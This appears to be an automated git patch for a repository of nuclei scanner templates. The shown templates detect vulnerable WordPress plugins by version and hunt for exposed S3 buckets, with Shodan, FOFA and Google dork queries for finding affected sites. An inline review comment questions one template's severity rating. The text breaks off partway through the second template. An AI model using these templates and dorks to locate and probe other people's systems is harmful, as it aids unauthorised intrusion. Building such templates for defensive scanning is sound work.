From deeb63a6df68a817960a6e4d08eb69455402279c Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Wed, 11 Sep 2024 12:39:43 +0000 Subject: [PATCH] 20240911 --- date.txt | 2 +- poc.txt | 38 ++++++ poc/aws/s3hunter.yaml | 27 ++--- ...5212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml | 59 ++++++++++ poc/cve/CVE-2023-2919.yaml | 59 ++++++++++ ...6067-6d5f6295ab44f72b338a0a1499add7f5.yaml | 59 ++++++++++ ...5061-085abacaaba8ff4788c74e8b165121fb.yaml | 59 ++++++++++ ...5416-b035cee38aeca20c0511efbe55146c96.yaml | 59 ++++++++++ poc/cve/CVE-2024-6282.yaml | 59 ++++++++++ ...6335-84de910af85c0afe2f599b3df45be46d.yaml | 59 ++++++++++ poc/cve/CVE-2024-7618.yaml | 59 ++++++++++ ...7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml | 59 ++++++++++ poc/cve/CVE-2024-7655.yaml | 59 ++++++++++ ...7721-dabffc45b2b1ccb0d8463248830df7d5.yaml | 59 ++++++++++ ...7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml | 59 ++++++++++ poc/cve/CVE-2024-7770.yaml | 59 ++++++++++ ...8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml | 59 ++++++++++ poc/cve/CVE-2024-8241.yaml | 59 ++++++++++ ...8253-e2234cc208110923d0c092c69c0a152e.yaml | 59 ++++++++++ poc/cve/CVE-2024-8268.yaml | 59 ++++++++++ ...8277-60e40034fde9b34dd19d7bd360de5d19.yaml | 59 ++++++++++ poc/cve/CVE-2024-8369.yaml | 59 ++++++++++ ...8440-a970a1df0c7918e0736009309dc70109.yaml | 59 ++++++++++ poc/cve/CVE-2024-8478.yaml | 59 ++++++++++ poc/cve/CVE-2024-8543.yaml | 59 ++++++++++ poc/cve/cve-2020-16920.yaml | 110 +++++++++--------- poc/cve/cve-2020-36112.yaml | 30 +++++ poc/cve/cve-2021-20837.yaml | 66 +++++------ poc/cve/cve-2022-0921.yaml | 28 +++-- poc/debug/wp-debug-log.yaml | 58 ++++----- poc/google/google-secrets.yaml | 16 +-- ...-php-38595c300b5439c3ff06f9de9b42f302.yaml | 59 ++++++++++ ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +++++--- .../Hikvision_Env_Information_Leakage.yaml | 47 +++++--- poc/other/Nsfocus_sas_getFile_read.yaml | 31 +---- ...unds-7eca2ce569a1f864194b199d672f550a.yaml | 59 ++++++++++ ...ipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml | 59 ++++++++++ ...ntor-4124ad49f7a0510cf08a935c97d1246a.yaml | 59 
++++++++++ ...lite-6f7de55f53ce42165d9aa81f04368fe3.yaml | 59 ++++++++++ poc/other/groovy-console-open.yaml | 20 ++-- ...ayer-54a27fb63349216a80cf2f59f38ae402.yaml | 59 ++++++++++ poc/other/jenk.yaml | 2 +- poc/other/nova-blocks.yaml | 59 ++++++++++ ...grid-eaed240a4f4b283e08088fd58f4489e7.yaml | 59 ++++++++++ poc/other/qualitor.yaml | 20 ++++ ...der-comparison-image-before-and-after.yaml | 59 ++++++++++ ...ager-44229e301b00fab19a97495d12bba74f.yaml | 59 ++++++++++ ...-php-38595c300b5439c3ff06f9de9b42f302.yaml | 59 ++++++++++ .../Hikvision_applyCT_RCE.yaml | 45 +++++-- ...iews-8eabd8f3601428e7f9c625d55482bc6c.yaml | 59 ++++++++++ ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- poc/sql/ecology-sqli2.yaml | 6 +- poc/sql/error-based-sqli.yaml | 7 +- ...ayer-1d6d633d5a9085295638ff332db34930.yaml | 59 ++++++++++ ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- poc/sql_injection/ecology-sqli2.yaml | 6 +- poc/sql_injection/error-based-sqli.yaml | 7 +- poc/ssrf/generic-ssrf.yaml | 2 +- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +++++--- .../Nsfocus_NF_Firewall_FileUpload.yaml | 65 +++-------- poc/wordpress/wp-debug-log.yaml | 58 ++++----- ...tbox-fc78c591ca38d0ab42ea5c6753b32375.yaml | 59 ++++++++++ 62 files changed, 2564 insertions(+), 405 deletions(-) create mode 100644 poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml create mode 100644 poc/cve/CVE-2023-2919.yaml create mode 100644 poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml create mode 100644 poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml create mode 100644 poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml create mode 100644 poc/cve/CVE-2024-6282.yaml create mode 100644 poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml create mode 100644 poc/cve/CVE-2024-7618.yaml create mode 100644 poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml create mode 100644 poc/cve/CVE-2024-7655.yaml create mode 100644 
poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml create mode 100644 poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml create mode 100644 poc/cve/CVE-2024-7770.yaml create mode 100644 poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml create mode 100644 poc/cve/CVE-2024-8241.yaml create mode 100644 poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml create mode 100644 poc/cve/CVE-2024-8268.yaml create mode 100644 poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml create mode 100644 poc/cve/CVE-2024-8369.yaml create mode 100644 poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml create mode 100644 poc/cve/CVE-2024-8478.yaml create mode 100644 poc/cve/CVE-2024-8543.yaml create mode 100644 poc/cve/cve-2020-36112.yaml mode change 100755 => 100644 poc/debug/wp-debug-log.yaml create mode 100644 poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml create mode 100644 poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml create mode 100644 poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml create mode 100644 poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml create mode 100644 poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml create mode 100644 poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml create mode 100644 poc/other/nova-blocks.yaml create mode 100644 poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml create mode 100644 poc/other/qualitor.yaml create mode 100644 poc/other/slider-comparison-image-before-and-after.yaml create mode 100644 poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml create mode 100644 poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml create mode 100644 poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml create mode 100644 poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml mode change 100755 => 100644 
poc/wordpress/wp-debug-log.yaml create mode 100644 poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml diff --git a/date.txt b/date.txt index 83b31cda11..2abf40291e 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240910 +20240911 diff --git a/poc.txt b/poc.txt index 23d0ead20c..f56864bfcc 100644 --- a/poc.txt +++ b/poc.txt @@ -13997,6 +13997,7 @@ ./poc/cve/CVE-2019-25152-4e7b3d2899eea5aa12c073c8cef2fd0d.yaml ./poc/cve/CVE-2019-25152-72081e24ce32b3d7a0640320e699b222.yaml ./poc/cve/CVE-2019-25152.yaml +./poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml ./poc/cve/CVE-2019-2578-1.yaml ./poc/cve/CVE-2019-2578-2.yaml ./poc/cve/CVE-2019-2578.yaml @@ -26380,6 +26381,7 @@ ./poc/cve/CVE-2023-29174-61b19180a709a75a8f2f6bd443cf11c8.yaml ./poc/cve/CVE-2023-29174.yaml ./poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml +./poc/cve/CVE-2023-2919.yaml ./poc/cve/CVE-2023-29197-7dc7820b451dace4c37e93f29ab994ee.yaml ./poc/cve/CVE-2023-29197-a89dc10c82ed3d904f8fccc2ff4db320.yaml ./poc/cve/CVE-2023-29197.yaml @@ -31981,6 +31983,7 @@ ./poc/cve/CVE-2023-6065-5ad50c58e298bc77570d945554b07077.yaml ./poc/cve/CVE-2023-6065.yaml ./poc/cve/CVE-2023-6067-23c24c19315775c2194006beecf7ca05.yaml +./poc/cve/CVE-2023-6067-6d5f6295ab44f72b338a0a1499add7f5.yaml ./poc/cve/CVE-2023-6067.yaml ./poc/cve/CVE-2023-6077-b787a70a99222689ff4a051daad2ffd8.yaml ./poc/cve/CVE-2023-6077.yaml @@ -41221,6 +41224,7 @@ ./poc/cve/CVE-2024-5059.yaml ./poc/cve/CVE-2024-5060-0e9bb89e270fce112d686bcb31ddac36.yaml ./poc/cve/CVE-2024-5060.yaml +./poc/cve/CVE-2024-5061-085abacaaba8ff4788c74e8b165121fb.yaml ./poc/cve/CVE-2024-5061-e85fb07ba4a08a3b3d95773fe18c51f6.yaml ./poc/cve/CVE-2024-5061.yaml ./poc/cve/CVE-2024-5071-783fe5cda41afb7fa1d0cebcc413aaf2.yaml 
@@ -41419,6 +41423,7 @@ ./poc/cve/CVE-2024-5349.yaml ./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml ./poc/cve/CVE-2024-5382.yaml +./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml ./poc/cve/CVE-2024-5418-434a339fc4d8515bf3d8877608840f7e.yaml ./poc/cve/CVE-2024-5418.yaml ./poc/cve/CVE-2024-5419-6c5a95dfcb26729f4b1f7034ca7aef48.yaml @@ -41958,6 +41963,7 @@ ./poc/cve/CVE-2024-6272-603d5732dac8de6d8f0b5ed827bd29fe.yaml ./poc/cve/CVE-2024-6272.yaml ./poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml +./poc/cve/CVE-2024-6282.yaml ./poc/cve/CVE-2024-6283-b109f55830b5166e15fc8153b2a56ea0.yaml ./poc/cve/CVE-2024-6283.yaml ./poc/cve/CVE-2024-6288-3b7a2d7a942fc59043d359b6700da5b3.yaml @@ -42014,6 +42020,7 @@ ./poc/cve/CVE-2024-6332.yaml ./poc/cve/CVE-2024-6334-32cc27bdc2750532a6a94260dc479796.yaml ./poc/cve/CVE-2024-6334.yaml +./poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml ./poc/cve/CVE-2024-6338-2cb15f594519463fb002e59f93b4f8b0.yaml ./poc/cve/CVE-2024-6338.yaml ./poc/cve/CVE-2024-6339-8aab95c35ab2f543f319207ba5af5758.yaml @@ -42535,6 +42542,7 @@ ./poc/cve/CVE-2024-7611-fa595bf0bd7d1cd7d067d139d8655508.yaml ./poc/cve/CVE-2024-7611.yaml ./poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml +./poc/cve/CVE-2024-7618.yaml ./poc/cve/CVE-2024-7620-bcec0146e1a4df3dcb256abef7433801.yaml ./poc/cve/CVE-2024-7620.yaml ./poc/cve/CVE-2024-7621-410ca600b3388f15ef833a17e3d39b81.yaml @@ -42543,6 +42551,7 @@ ./poc/cve/CVE-2024-7622.yaml ./poc/cve/CVE-2024-7624-ebfd9e3cba7ebe22ec232d00cda9ba4f.yaml ./poc/cve/CVE-2024-7624.yaml +./poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml ./poc/cve/CVE-2024-7627-89a7ba1cc9a6f6445a389a024cfcf883.yaml ./poc/cve/CVE-2024-7627.yaml ./poc/cve/CVE-2024-7628-3bb6c5b2894c843f8737291215f30580.yaml 
@@ -42561,6 +42570,7 @@ ./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml ./poc/cve/CVE-2024-7651.yaml ./poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml +./poc/cve/CVE-2024-7655.yaml ./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml ./poc/cve/CVE-2024-7656.yaml ./poc/cve/CVE-2024-7687-ec8f591b67a17cc36542cbb68d2a1c0e.yaml @@ -42581,7 +42591,10 @@ ./poc/cve/CVE-2024-7703.yaml ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7717.yaml +./poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml +./poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml ./poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml +./poc/cve/CVE-2024-7770.yaml ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml ./poc/cve/CVE-2024-7775.yaml ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml @@ -42645,6 +42658,7 @@ ./poc/cve/CVE-2024-8043.yaml ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml ./poc/cve/CVE-2024-8044.yaml +./poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml ./poc/cve/CVE-2024-8046-15e0de38601f3b1bc315968586b907cd.yaml ./poc/cve/CVE-2024-8046.yaml ./poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml 
@@ -42686,15 +42700,19 @@ ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml ./poc/cve/CVE-2024-8200.yaml ./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml +./poc/cve/CVE-2024-8241.yaml ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml ./poc/cve/CVE-2024-8247.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml ./poc/cve/CVE-2024-8252.yaml +./poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml ./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml +./poc/cve/CVE-2024-8268.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml ./poc/cve/CVE-2024-8274.yaml ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml ./poc/cve/CVE-2024-8276.yaml +./poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml ./poc/cve/CVE-2024-8289-547295faa6591e5ec09f536a86cfff13.yaml ./poc/cve/CVE-2024-8289-87a431b046b6c387f38f06ebe340c64f.yaml ./poc/cve/CVE-2024-8289.yaml @@ -42711,16 +42729,20 @@ ./poc/cve/CVE-2024-8363-7b614cefc269f651d0fa9d8a81fb52fb.yaml ./poc/cve/CVE-2024-8363.yaml ./poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml +./poc/cve/CVE-2024-8369.yaml ./poc/cve/CVE-2024-8427-fbcab5496b8138780394aea71f3f3840.yaml ./poc/cve/CVE-2024-8427.yaml ./poc/cve/CVE-2024-8428-3b140a48fddab0e2501d7d69c672d7cf.yaml ./poc/cve/CVE-2024-8428.yaml +./poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml ./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml +./poc/cve/CVE-2024-8478.yaml ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml ./poc/cve/CVE-2024-8480.yaml ./poc/cve/CVE-2024-8538-001bcf7ee52037e79f6a696add474366.yaml ./poc/cve/CVE-2024-8538.yaml ./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml +./poc/cve/CVE-2024-8543.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml 
@@ -47675,6 +47697,7 @@ ./poc/cve/cve-2020-36112-5116.yaml ./poc/cve/cve-2020-36112-5117.yaml ./poc/cve/cve-2020-36112-5118.yaml +./poc/cve/cve-2020-36112.yaml ./poc/cve/cve-2020-36287(1).yaml ./poc/cve/cve-2020-36287-5119.yaml ./poc/cve/cve-2020-36287.yaml @@ -57647,6 +57670,7 @@ ./poc/javascript/css-js-manager-dd231efebb1e010c5c07cb1c4932234f.yaml ./poc/javascript/css-js-manager.yaml ./poc/javascript/custom-css-js-705d050c5e0c5c96bf187eb782493157.yaml +./poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml ./poc/javascript/custom-css-js.yaml ./poc/javascript/custom-mapview-jsp-detect.yaml ./poc/javascript/cve2json.yml @@ -63403,6 +63427,7 @@ ./poc/other/advanced-ajax-page-loader-73c51238dff4af1331aac9d91f9ae182.yaml ./poc/other/advanced-ajax-page-loader-94b986ce02c9c2e3c3d960667cb1b92d.yaml ./poc/other/advanced-ajax-page-loader.yaml +./poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml ./poc/other/advanced-booking-calendar-14ec1d72b66e6743ab3b4dce700bdfbf.yaml ./poc/other/advanced-booking-calendar-1a2ee554af2bac4ad469ee7bed611a9a.yaml ./poc/other/advanced-booking-calendar-1b2f93fedafab9000d6f605166dac9f8.yaml @@ -70208,6 +70233,7 @@ ./poc/other/delete-usermetas.yaml ./poc/other/delhivery-logistics-courier-e540fdefb7cb34683c3c4a72e8a9c3bc.yaml ./poc/other/delhivery-logistics-courier.yaml +./poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml ./poc/other/delicious-recipes-ac6497f90b87539235fa65f903a4be42.yaml ./poc/other/delicious-recipes-b301e06b5394f13942c93a763ac7eb0e.yaml ./poc/other/delicious-recipes.yaml 
@@ -71839,6 +71865,7 @@ ./poc/other/elementor-30bed69a3066a11bde1e59215e3cd5b4.yaml ./poc/other/elementor-32f0ca887f580098243f40cf3ab99a89.yaml ./poc/other/elementor-404bc74d32cb335460b4bb18ffb6189d.yaml +./poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml ./poc/other/elementor-63a6119e4f6daaa33e6878ea6e715de3.yaml ./poc/other/elementor-7c36003a5ccd8ec9e2eb9f7969437fa3.yaml ./poc/other/elementor-8e5d5b48ff36c70993cbdc6d61dc589a.yaml @@ -72453,6 +72480,7 @@ ./poc/other/essential-addons-for-elementor-lite-666cbf792214c3d525aa565b29a0f2c6.yaml ./poc/other/essential-addons-for-elementor-lite-683680b46d9435dede777a4e11bd6500.yaml ./poc/other/essential-addons-for-elementor-lite-68816d09ad6e75dcfb11927cb6841204.yaml +./poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml ./poc/other/essential-addons-for-elementor-lite-71347d2cd7685fe2d2f770d916924f17.yaml ./poc/other/essential-addons-for-elementor-lite-72d2adccac047c82b3f7cf848bce940a.yaml ./poc/other/essential-addons-for-elementor-lite-7f96d0ee0a1e53ab3608c0ca6f3fb993.yaml @@ -76167,6 +76195,7 @@ ./poc/other/html5-soundcloud-player-with-playlist-4d1667fb6e30b2ac93e754f36234469e.yaml ./poc/other/html5-soundcloud-player-with-playlist.yaml ./poc/other/html5-video-player-0d2cf6941c370b58ffb31226e43735d1.yaml +./poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml ./poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml ./poc/other/html5-video-player-cba7fe3e122d338cdcaadebd04df764f.yaml ./poc/other/html5-video-player-eb51e10eb4da657b0275fe0f0befe3f2.yaml @@ -81728,6 +81757,7 @@ ./poc/other/notifyvisitors-lead-form.yaml ./poc/other/notion-phish.yaml ./poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml +./poc/other/nova-blocks.yaml ./poc/other/nova-lite-edebb837b13ffab3391e4efe2a95bf38.yaml ./poc/other/nova-lite.yaml ./poc/other/novelist-2fcbba4f8d24450ee551bf33de17fc72.yaml 
@@ -83750,6 +83780,7 @@ ./poc/other/post-grid-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/post-grid-d63e7eeaf75b63791d5823ac225229c4.yaml ./poc/other/post-grid-dcc1fae08ff10019458f6ff816f3f258.yaml +./poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml ./poc/other/post-grid-elementor-addon-cc427b19936dd19a8a708c6e47d48ade.yaml ./poc/other/post-grid-elementor-addon.yaml ./poc/other/post-grid-f2d7c7f2cc97a31a649fe636e2268f8a.yaml @@ -84646,6 +84677,7 @@ ./poc/other/quadmenu.yaml ./poc/other/qualcomm-voip-router-9771.yaml ./poc/other/qualcomm-voip-router.yaml +./poc/other/qualitor.yaml ./poc/other/quality-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/quality-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/quality-theme-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -87942,6 +87974,7 @@ ./poc/other/slider-by-supsystic-e595a0c3ad3e0defdd41b40b77d69b2c.yaml ./poc/other/slider-by-supsystic.yaml ./poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml +./poc/other/slider-comparison-image-before-and-after.yaml ./poc/other/slider-factory-0712326ce3eb85c1c14309021d79da22.yaml ./poc/other/slider-factory-42e7c67c33e54fce9877ed077a2d8484.yaml ./poc/other/slider-factory-6352f4cd29f3e453ab1742964f7f7fd8.yaml @@ -90567,6 +90600,7 @@ ./poc/other/tracked-tweets-plugin.yaml ./poc/other/tracked-tweets.yaml ./poc/other/tracking-code-manager-059ef46ea5bc5f14527be57feee52bce.yaml +./poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml ./poc/other/tracking-code-manager-7181bc008679cb648223a20b28d2e7e9.yaml ./poc/other/tracking-code-manager-83fec47a8c1f5faff60b8bda7bf7b2e2.yaml ./poc/other/tracking-code-manager-8b7e180c1040d966864eb92902f9b355.yaml 
@@ -95061,6 +95095,7 @@ ./poc/php/const-DB-php-bak.yaml ./poc/php/cryptographp-db0995fcce0b587938843ee9f532e46f.yaml ./poc/php/cryptographp.yaml +./poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml ./poc/php/default-cakephp-page.yaml ./poc/php/douphp.yaml ./poc/php/drupal_module-acl-arbitrary-php-code-execution.yaml @@ -98407,6 +98442,7 @@ ./poc/remote_code_execution/woocommerce-pdf-vouchers-724dccd0dc3c1d74c070088ae6db5625.yaml ./poc/remote_code_execution/woocommerce-pdf-vouchers-f2e20e333c1c84b75ca0fcb1020fa3d0.yaml ./poc/remote_code_execution/woocommerce-pdf-vouchers.yaml +./poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml ./poc/remote_code_execution/woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woocommerce-plugin.yaml ./poc/remote_code_execution/woocommerce-pos-c5391e8d69ffbd0565b5ecdd695e1050.yaml @@ -105171,6 +105207,7 @@ ./poc/sql/html5-maps-09431ac7051652adb8e4fb2e66a5b8db.yaml ./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist-8184d8d92561017974e3799804b8964f.yaml ./poc/sql/html5-mp3-player-with-mp3-folder-feedburner-playlist.yaml +./poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml ./poc/sql/html5-video-player-66d1c126fdb6da3483cf3a67e28954d4.yaml ./poc/sql/huatian-oa-sqli.yaml ./poc/sql/huatian-oa-workFlowService-sqli.yaml @@ -117537,6 +117574,7 @@ ./poc/wordpress/wp-responsive-thumbnail-slider.yaml ./poc/wordpress/wp-responsive-video-gallery-with-lightbox-4efb64b85896db248a3009b15c2811ba.yaml ./poc/wordpress/wp-responsive-video-gallery-with-lightbox-8e39bc98f07285b3bef062b545f763f4.yaml +./poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml ./poc/wordpress/wp-responsive-video-gallery-with-lightbox.yaml ./poc/wordpress/wp-rest-api-authentication-803c6ee19deb8e7eb8b2ebad82b60283.yaml ./poc/wordpress/wp-rest-api-authentication.yaml 
diff --git a/poc/aws/s3hunter.yaml b/poc/aws/s3hunter.yaml index d721f9c850..4ea5f03e5f 100644 --- a/poc/aws/s3hunter.yaml +++ b/poc/aws/s3hunter.yaml @@ -1,13 +1,14 @@ -id: s3-hunter -info: - name: Hunts for unreferenced AWS S3 Buckets - author: glatisant - severity: medium -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - 'ListBucketResult' +id: s3-hunter + +info: + name: Hunts for unreferenced AWS S3 Buckets + author: glatisant + severity: medium +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - 'ListBucketResult' \ No newline at end of file diff --git a/poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml b/poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml new file mode 100644 index 0000000000..0a1d49f994 --- /dev/null +++ b/poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142
+
+info:
+ name: >
+ video carousel slider with lightbox <= 1.0.6 - Authenticated (Admin+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The video carousel slider with lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2019-25212
+ metadata:
+ fofa-query: "wp-content/plugins/wp-responsive-video-gallery-with-lightbox/"
+ google-query: inurl:"/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/"
+ shodan-query: 'vuln:CVE-2019-25212'
+ tags: cve,wordpress,wp-plugin,wp-responsive-video-gallery-with-lightbox,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-responsive-video-gallery-with-lightbox"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.6')
\ No newline at end of file
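Review bot: `severity: low` (and the trailing `low` tag) contradicts the `cvss-score: 9.1` and the `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` vector a few lines above it, which is a Critical rating; one of the two should be corrected, otherwise scanners that filter on severity silently drop a 9.1 finding. If the low rating is deliberate because exploitation needs an administrator account, say so in `description` rather than carrying the advisory score unchanged. Note also that the template only reads the version out of `readme.txt` and never touches the `id` parameter, so a hit means "version in the affected range", not a confirmed injection; I would add `Detection is version-based (readme.txt Stable tag) and does not verify the injection.` to the description so triage knows what the result proves.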
diff --git a/poc/cve/CVE-2023-2919.yaml b/poc/cve/CVE-2023-2919.yaml
new file mode 100644
index 0000000000..9ec22d99ee
--- /dev/null
+++ b/poc/cve/CVE-2023-2919.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-2919
+
+info:
+ name: >
+ Tutor LMS <= 2.7.4 - Cross-Site Request Forgery via 'addon_enable_disable'
+ author: topscoder
+ severity: medium
+ description: >
+ The Tutor LMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.4. This is due to missing or incorrect nonce validation on the 'addon_enable_disable' function. This makes it possible for unauthenticated attackers to enable or disable addons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/992abd72-2a8e-4bda-94c2-4a7f88487906?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2023-2919
+ metadata:
+ fofa-query: "wp-content/plugins/tutor/"
+ google-query: inurl:"/wp-content/plugins/tutor/"
+ shodan-query: 'vuln:CVE-2023-2919'
+ tags: cve,wordpress,wp-plugin,tutor,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt"
